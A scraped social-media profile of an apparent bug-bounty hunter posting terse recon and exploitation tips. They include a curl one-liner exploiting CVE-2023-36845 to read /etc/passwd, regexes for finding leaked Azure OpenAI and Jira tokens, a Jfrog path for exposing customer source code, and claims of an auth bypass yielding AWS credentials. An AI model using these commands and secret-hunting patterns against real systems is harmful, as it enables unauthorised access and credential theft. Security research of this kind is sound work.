shay Profile
shay

@shaybt12

Followers
2K
Following
41
Media
170
Statuses
325

Joined May 2017
Don't wanna be here? Send us removal request.
@shaybt12
shay
5 months
sometime when you fuzz you can find some crazy thing !
Tweet media one
0
0
6
@shaybt12
shay
6 months
in subdomin found phpinfo that leak google creds :)
Tweet media one
Tweet media two
9
22
430
@grok
Grok
7 days
Join millions who have switched to Grok.
208
347
2K
@shaybt12
shay
8 months
the diffrent between . to. its a classic misconfiguration .you can find this also with S3 buckets :)
Tweet media one
Tweet media two
1
0
7
@shaybt12
shay
9 months
So google change from p4 to p3.Is that mean that i will see $$$.LOL
Tweet media one
0
0
3
@shaybt12
shay
10 months
github leak : . azure open AI :.AZURE_OPENAI_API_KEY /[a-f0-9]{32}$/. jira token :./ATATT3[a-zA-Z0-9_\-+=]{184,195}$/. :).
5
76
581
@shaybt12
shay
2 years
CVE-2024-23897 :). good way to the weekend :)
Tweet media one
2
6
96
@shaybt12
shay
2 years
in js file.add regex for url .mongodb.net
Tweet media one
1
8
43
@shaybt12
shay
2 years
add to your JS finder. VITE_SUPABASE_ANON_KEY. mabye you get lucky and find live token :).
1
5
40
@shaybt12
shay
2 years
you found Jfrog URL.and you get 403 / 401 ?.try to add. /ui/repos/tree/General. mabye you get lucky and found nuget / other compile customer source code :)
Tweet media one
1
31
147
@shaybt12
shay
2 years
blind ssrf . :)
Tweet media one
4
3
86
@shaybt12
shay
2 years
found SonarQube endpoint. baypass auth login :). and you have aws creds :)
Tweet media one
4
16
140
@shaybt12
shay
2 years
database.json.so easy :)
Tweet media one
5
18
127
@shaybt12
shay
2 years
CVE-2023-36845. curl " http://xxxx:xxx/?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"' -X POST
Tweet media one
3
1
19
@shaybt12
shay
2 years
Code Server :)
Tweet media one
0
0
4
@shaybt12
shay
2 years
CVE-2023-35078. 6K website :)
Tweet media one
5
94
301
@shaybt12
shay
2 years
CVE-2023-38646
Tweet media one
Tweet media two
2
39
153
@shaybt12
shay
2 years
CVE-2023-34960. "Acceso al aula virtual"
Tweet media one
2
38
131
@shaybt12
shay
2 years
CVE-2023-34843 - Traggo - directory traversal.
Tweet media one
1
15
63
@shaybt12
shay
2 years
CVE-2023-35844 - directory traversal.
Tweet media one
0
33
103
@shaybt12
shay
2 years
CVE-2023-34598 - Local File Inclusion.Gibbon
Tweet media one
4
39
184